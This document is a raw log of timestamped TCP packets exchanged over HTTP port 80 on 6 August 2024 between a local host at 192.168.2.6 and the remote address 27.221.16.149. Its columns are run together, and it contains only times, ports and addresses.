                                                                                                                                    Aug 6, 2024 10:30:05.752737045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752742052 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:05.752779961 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:05.752779961 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:05.757834911 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.757849932 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.757937908 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:05.845629930 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.895710945 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.116417885 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116432905 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116450071 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116461992 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116475105 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116543055 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.116787910 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.116863966 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.116909027 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117039919 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117058039 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117069960 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117095947 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.117117882 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117130041 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117155075 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.117177010 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.117934942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.117947102 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.118052006 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.207129955 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.255114079 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.507831097 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507855892 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507867098 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507878065 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507894039 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507905006 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.507983923 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.508022070 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.508477926 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508496046 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508635044 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.508774996 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508788109 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508799076 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508809090 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.508862972 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.508862972 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.509196043 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.509289026 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.509341002 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.598292112 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.645711899 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.898432016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898449898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898461103 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898471117 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898482084 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898499012 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898510933 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.898588896 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.898660898 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.899286985 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899373055 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.899606943 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899617910 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899627924 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899637938 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899648905 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.899677038 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.899702072 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.900080919 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.900090933 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.900101900 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.900111914 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.900139093 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.900187016 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:06.900218964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:06.900276899 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.243498087 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243510962 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243521929 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243532896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243544102 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243673086 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.243798018 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243855953 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.243855953 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.243885040 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243896961 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243907928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243918896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.243936062 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.243999958 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.244334936 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244543076 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244554996 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244565010 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244575977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244586945 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.244606018 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.244632959 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.244656086 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.245201111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245213032 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245223999 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245234013 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245251894 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245261908 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.245281935 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.245307922 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628283024 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628365993 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628418922 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628509998 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628515005 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628566980 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628599882 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628602028 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628633022 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628667116 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628674984 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628700018 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628734112 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628739119 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628763914 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628794909 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628817081 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628827095 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628828049 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628839016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628850937 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628860950 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.628873110 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.628916979 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.629200935 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.629257917 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.629304886 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:07.629304886 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:07.629345894 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.008749962 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008769035 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008779049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008790016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008800983 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008811951 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008824110 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.008831024 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.008867025 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.008867025 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009021997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009032965 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009043932 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009054899 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009066105 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009067059 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009076118 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009087086 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009123087 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009123087 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009145021 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009756088 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009767056 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009778976 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009804964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009815931 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009826899 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009838104 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.009849072 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009850025 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.009912014 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.098983049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.145673037 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369115114 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369137049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369148016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369158030 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369168997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369179010 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369190931 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369201899 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369213104 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369236946 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369244099 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369246960 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369333982 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369445086 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369455099 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369488955 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369499922 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369544029 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369702101 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369713068 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369723082 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369735003 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369754076 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369791031 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.369848013 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369858980 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.369927883 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.370840073 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.370851040 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.370862007 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.370872974 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.370883942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.370915890 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.370955944 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713361979 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713409901 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713429928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713449001 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713468075 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713526011 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713529110 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713603973 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713618040 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713622093 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713650942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713669062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713686943 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713686943 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713707924 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713730097 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713747978 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713748932 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.713804960 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.713819027 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.714548111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714579105 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714597940 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714615107 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714632034 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714648008 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714658022 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.714658022 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.714668036 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.714689970 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.715150118 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715178967 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715195894 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715234041 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.715234041 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.715244055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715274096 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715292931 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715310097 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:08.715312004 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:08.715370893 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.057496071 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057527065 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057539940 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057554960 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057569981 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057595968 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057610035 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057625055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057643890 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057645082 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.057698011 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057702065 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.057712078 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057719946 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057728052 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.057821989 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058468103 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058482885 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058496952 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058511019 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058532953 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058621883 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058696032 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058711052 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058726072 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058743000 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058757067 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058787107 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058787107 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058811903 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058851957 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058866978 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058880091 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058895111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058911085 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.058943987 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.058970928 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.059554100 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.059575081 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.059583902 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.059591055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.059597969 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.059710026 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.148015976 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.192631960 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.386044025 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386065006 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386079073 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386095047 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386123896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386138916 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386153936 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386178970 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386193037 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386202097 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:09.386279106 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.386358976 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:09.386555910 CEST804977627.221.16.149192.168.2.6
